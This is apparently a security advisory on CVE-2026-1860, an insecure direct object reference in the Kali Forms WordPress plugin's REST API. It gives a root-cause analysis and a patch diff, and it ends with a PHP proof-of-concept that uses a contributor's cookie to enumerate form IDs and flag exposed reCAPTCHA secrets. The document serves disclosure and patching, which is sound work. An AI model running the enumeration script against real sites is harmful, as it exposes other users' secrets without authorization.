Atomic Edge analysis of CVE-2026-1860:
The Kali Forms WordPress plugin version 2.4.8 and earlier contains an Insecure Direct Object Reference vulnerability in its REST API. The vulnerability allows authenticated users with Contributor-level permissions or higher to access sensitive form configuration data belonging to other users, including administrators. The CVSS 4.3 score reflects the authenticated attack vector and confidentiality impact.
Root Cause:
The vulnerability originates in the `get_items_permissions_check()` function within `/kali-forms/Inc/Backend/Rest/class-forms-rest-controller.php`. The function only verifies the generic `edit_posts` capability (line 117) without performing resource-specific authorization. The function fails to check whether the requesting user owns the form resource identified by the `id` parameter in the REST request. This missing ownership validation creates the IDOR condition.
Exploitation:
An attacker with Contributor-level access can exploit this by sending GET requests to the `/wp-json/kaliforms/v1/forms/{id}` endpoint while enumerating integer form IDs. The attacker needs a valid WordPress authentication cookie. No special parameters or payloads are required beyond the numeric ID in the URL path. Successful exploitation returns the complete form configuration JSON object for any form ID the attacker can guess or discover.
Patch Analysis:
The patch adds ownership validation in three locations. In `get_items_permissions_check()` (lines 122-132), the patch retrieves the post object using `get_post()` and checks if the current user is either the form author (`post_author`) or has `manage_options` capability. The same validation logic appears in `edit_item_check()` (lines 147-157). Additionally, the patch modifies the `get_items()` method (lines 212-215) to restrict form listings to the current user’s forms unless they have `manage_options`. These changes enforce proper authorization at both the collection and individual resource levels.
Impact:
Successful exploitation exposes sensitive form configuration data belonging to any user. This includes form field structures, Google reCAPTCHA secret keys, email notification templates with potentially sensitive content, and server path information. Exposed reCAPTCHA secrets could allow attackers to bypass CAPTCHA protection across the site. The path disclosure may assist in further attacks. The vulnerability enables horizontal privilege escalation where low-privileged users can access administrative form data.
--- a/kali-forms/Inc/Backend/Rest/class-forms-rest-controller.php
+++ b/kali-forms/Inc/Backend/Rest/class-forms-rest-controller.php
@@ -110,6 +110,9 @@
}
/**
+ * Checks permission for listing and viewing forms.
+ * Users must have edit_posts. For single-item requests, user must be the form author or have manage_options.
+ *
* @param WP_REST_Request $request
* @return bool|WP_Error
*/
@@ -119,14 +122,24 @@
return new WP_Error('rest_forbidden', esc_html__('You cannot view the post resource.', 'kali-forms'), ['status' => $this->authorization_status_code()]);
}
+ // For single-item requests, check ownership.
+ if (isset($request['id'])) {
+ $post = get_post((int) $request['id']);
+ if ($post && $post->post_type === $this->slug . '_forms') {
+ if ((int) $post->post_author !== get_current_user_id() && !current_user_can('manage_options')) {
+ return new WP_Error('rest_forbidden', esc_html__('You do not have permission to access this form.', 'kali-forms'), ['status' => 403]);
+ }
+ }
+ }
+
return true;
}
/**
- * Check permission to edit a post
+ * Check permission to edit a form. User must have edit_posts and be the form author or have manage_options.
*
- * @param [type] $request
- * @return void
+ * @param WP_REST_Request $request
+ * @return bool|WP_Error
*/
public function edit_item_check($request)
{
@@ -134,6 +147,15 @@
return new WP_Error('rest_forbidden', esc_html__('You cannot edit the post resource.', 'kali-forms'), ['status' => $this->authorization_status_code()]);
}
+ if (isset($request['id'])) {
+ $post = get_post((int) $request['id']);
+ if ($post && $post->post_type === $this->slug . '_forms') {
+ if ((int) $post->post_author !== get_current_user_id() && !current_user_can('manage_options')) {
+ return new WP_Error('rest_forbidden', esc_html__('You do not have permission to edit this form.', 'kali-forms'), ['status' => 403]);
+ }
+ }
+ }
+
return true;
}
@@ -190,6 +212,11 @@
}
}
+ // Restrict to current user's forms unless they can manage options.
+ if (!current_user_can('manage_options')) {
+ $args['author'] = get_current_user_id();
+ }
+
$query_args = $this->prepare_items_query($args, $request);
$posts_query = new WP_Query();
--- a/kali-forms/bootstrap.php
+++ b/kali-forms/bootstrap.php
@@ -15,4 +15,4 @@
define('KALIFORMS_BASE_API', 'https://www.kaliforms.com/wp-json/wp/v2/');
define('KALIFORMS_EXTENSIONS_API', 'https://kaliforms.com/wp-json/kf/v1/plugins');
define('KALIFORMS_UNINSTALL_FEEDBACK_API', 'https://kaliforms.com/wp-json/kf/v1/uninstall-feedback');
-define('KALIFORMS_VERSION', '2.4.8');
+define('KALIFORMS_VERSION', '2.4.9');
--- a/kali-forms/kali-forms.php
+++ b/kali-forms/kali-forms.php
@@ -5,7 +5,7 @@
* Plugin URI: https://www.kaliforms.com
* Description: Kali Forms provides a user-friendly form creation experience for WordPress.
* Author: Kali Forms
- * Version: 2.4.8
+ * Version: 2.4.9
* Author URI: https://www.kaliforms.com/
* License: GPLv3 or later
* License URI: http://www.gnu.org/licenses/gpl-3.0.html
// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-1860 - Kali Forms <= 2.4.8 - Insecure Direct Object Reference to Authenticated (Contributor+) Sensitive Form Data Exposure
<?php
$target_url = 'https://vulnerable-site.com';
$cookie = 'wordpress_logged_in_abc=...'; // Valid auth cookie for Contributor+ user
// Function to test form ID access
function test_form_id($id) {
global $target_url, $cookie;
$url = $target_url . '/wp-json/kaliforms/v1/forms/' . $id;
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, [
'Cookie: ' . $cookie,
'Content-Type: application/json'
]);
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);
if ($http_code === 200) {
$data = json_decode($response, true);
if (isset($data['id']) && $data['id'] == $id) {
return $data;
}
}
return false;
}
// Test a range of form IDs
for ($i = 1; $i <= 100; $i++) {
$form_data = test_form_id($i);
if ($form_data !== false) {
echo "[+] Found accessible form ID: $in";
echo " Form Title: " . ($form_data['title'] ?? 'N/A') . "n";
// Check for sensitive data
if (isset($form_data['google'])) {
echo " Google reCAPTCHA secret present: " . (isset($form_data['google']['secretKey']) ? 'YES' : 'NO') . "n";
}
if (isset($form_data['emails'])) {
echo " Email templates: " . count($form_data['emails']) . "n";
}
echo "n";
}
}
?>
